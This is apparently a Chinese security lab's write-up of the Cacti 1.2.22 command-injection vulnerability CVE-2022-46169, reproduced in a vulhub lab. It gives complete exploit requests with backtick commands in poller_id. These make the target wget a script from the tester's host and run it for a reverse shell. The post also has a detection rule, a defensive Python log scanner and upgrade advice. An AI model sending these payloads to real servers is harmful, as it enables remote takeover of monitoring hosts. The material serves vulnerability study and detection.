Cacti Command Execution Vulnerability (CVE-2022-46169) - 0h - NGC660 安全实验室 (NGC660 Security Lab)

Cacti Command Execution Vulnerability (CVE-2022-46169) - 0h

Vulnerability Overview

Cacti is a network traffic monitoring and graphing tool built on PHP, MySQL, SNMP and RRDTool.
In this vulnerability, an attacker controls the $poller_id parameter, which is retrieved with the get_nfilter_request_var() function (that is, without filtering), and crafts the local_data_ids parameter so that the condition poller_item = POLLER_ACTION_SCRIPT_PHP is met. This reaches a proc_open() call with the attacker-controlled value and results in command execution.

Affected Version

Cacti == 1.2.22

Exploitation Prerequisites

The Cacti instance must contain at least one poller item of type POLLER_ACTION_SCRIPT_PHP.

Environment Setup

Pull the environment directly with vulhub:

cd vulhub-master/cacti/CVE-2022-46169/
docker-compose up -d 
docker-compose ps 

Once the environment is up, visiting port 8080 on the target redirects to the login page. Create a username and password, then follow the on-screen prompts to initialize, clicking "Next" until the installation completes.
Log in to the Cacti console and create a new Graph.
The Graph Type to create is "Device – Uptime".
Click Create.

Vulnerability Reproduction

Capture the home page request with Burp and craft the request payload to achieve RCE.
POC:

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`<command to execute>` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Here I chose to send the username back to dnslog.
We can see that the command executed successfully: the command output has arrived at dnslog.
Building the EXP
Start an HTTP server with Python:

python3 -m http.server 80

Make the target download the malicious file:

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`wget http://192.168.64.129:8080/exp.sh -O /tmp/exp.sh` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Start a listener on Kali, run the EXP, and obtain a shell:

nc -lvvp 8888

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=;/remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`/bin/bash+/tmp/exp.sh` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: 192.168.64.133:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: CactiDateTime=Tue Mar 07 2023 09:49:44 GMT+0800 (中国标准时间); CactiTimeZone=480; Cacti=5f5a478fc065c3a185f8b52bb3980f8b
Upgrade-Insecure-Requests: 1

Reverse shell received successfully.

Writing a Detection POC Rule

params: []
name: Cacti命令执行漏洞-CVE-2022-46169
set: {}
rules:
- method: GET
  path: /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`whoami`
  headers:
    X-Forwarded-For: 127.0.0.1
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b"uptime")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""
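The rule above probes a target actively. As an added example that is not from the original post or from the Cacti project, the following Python script gives the passive counterpart for two points made on this page: the overview notes that poller_id reaches proc_open() without filtering, and the reproduction requests all carry X-Forwarded-For: 127.0.0.1. The script models the strict integer check that poller_id should be held to, applies it to web-server access logs for remote_agent.php, and also flags a loopback X-Forwarded-For presented by an external client. The log layout (combined format with the X-Forwarded-For value appended as a trailing quoted field) and the sample lines are constructed assumptions, not real captures.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Strict whitelist for poller_id: a non-negative integer with no leading zeros,
# which is what an integer filter (unlike the unfiltered get_nfilter_request_var()
# named in the write-up) would accept. Backticks and every other shell
# metacharacter fail this test.
POLLER_ID_RE = re.compile(r"0|[1-9][0-9]*")

# Values an external client should never present in X-Forwarded-For; the
# requests in this write-up carry 127.0.0.1 here.
LOOPBACK_VALUES = {"127.0.0.1", "::1", "localhost"}

# Constructed Apache-style layout (assumption): combined log format plus the
# X-Forwarded-For value appended as a final quoted field.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "[^"]*" "(?P<xff>[^"]*)"$'
)


def is_valid_poller_id(value: str) -> bool:
    """True only for a plain integer, as a hardened server-side check should require."""
    return POLLER_ID_RE.fullmatch(value) is not None


def inspect_request(target: str, xff: Optional[str] = None) -> dict:
    """Explain why a request to remote_agent.php looks like CVE-2022-46169 abuse."""
    parts = urlsplit(target)
    reasons = []
    if parts.path != "/remote_agent.php":
        return {"suspicious": False, "reasons": reasons}
    # parse_qs percent-decodes, so %60whoami%60 and `whoami` are judged alike.
    params = parse_qs(parts.query, keep_blank_values=True)
    # PHP keeps the last occurrence of a repeated key; every copy is still reported.
    for value in params.get("poller_id", []):
        if not is_valid_poller_id(value):
            reasons.append(f"poller_id is not an integer: {value!r}")
    if xff and xff != "-" and xff.strip() in LOOPBACK_VALUES:
        reasons.append(f"loopback X-Forwarded-For from an external client: {xff!r}")
    return {"suspicious": bool(reasons), "reasons": reasons}


def scan_log(lines) -> list:
    """Run inspect_request over access-log lines and collect the flagged ones."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed layout; skip rather than guess
        verdict = inspect_request(m["target"], m["xff"])
        if verdict["suspicious"]:
            hits.append({"client": m["client"], "timestamp": m["ts"],
                         "target": m["target"], "reasons": verdict["reasons"]})
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    # a legitimate remote poller fetching its data with an integer poller_id
    '10.0.0.5 - - [07/Mar/2023:09:49:44 +0800] "GET /remote_agent.php?action=polldata'
    '&local_data_ids[0]=6&host_id=1&poller_id=1 HTTP/1.1" 200 512 "-" "Cacti-Poller" "-"',
    # the injection pattern shown in this write-up, with a spoofed loopback X-Forwarded-For
    '192.168.64.129 - - [07/Mar/2023:09:50:01 +0800] "GET /remote_agent.php?action=polldata'
    '&local_data_ids[0]=6&host_id=1&poller_id=`whoami` HTTP/1.1" 200 611 "-" "Mozilla/5.0" "127.0.0.1"',
    # the same payload percent-encoded, to show that the decoder matters
    '192.168.64.129 - - [07/Mar/2023:09:50:09 +0800] "GET /remote_agent.php?action=polldata'
    '&local_data_ids%5B0%5D=6&host_id=1&poller_id=%60whoami%60 HTTP/1.1" 200 611 "-" "Mozilla/5.0" "127.0.0.1"',
    # an unrelated page that must not be flagged
    '10.0.0.7 - - [07/Mar/2023:09:51:00 +0800] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0" "-"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["timestamp"], hit["target"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

Two details matter for any rule built on this idea: decode the query string before matching, since the same payload can arrive percent-encoded, and examine every poller_id occurrence rather than the first, because PHP takes the last value of a repeated key (the shell-stage request on this page contains poller_id twice). The same integer check, applied server-side before the value reaches proc_open(), is the class of fix that removes the injection.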

Remediation

Upgrade to a patched version.
Download link:

https://github.com/Cacti/cacti/tags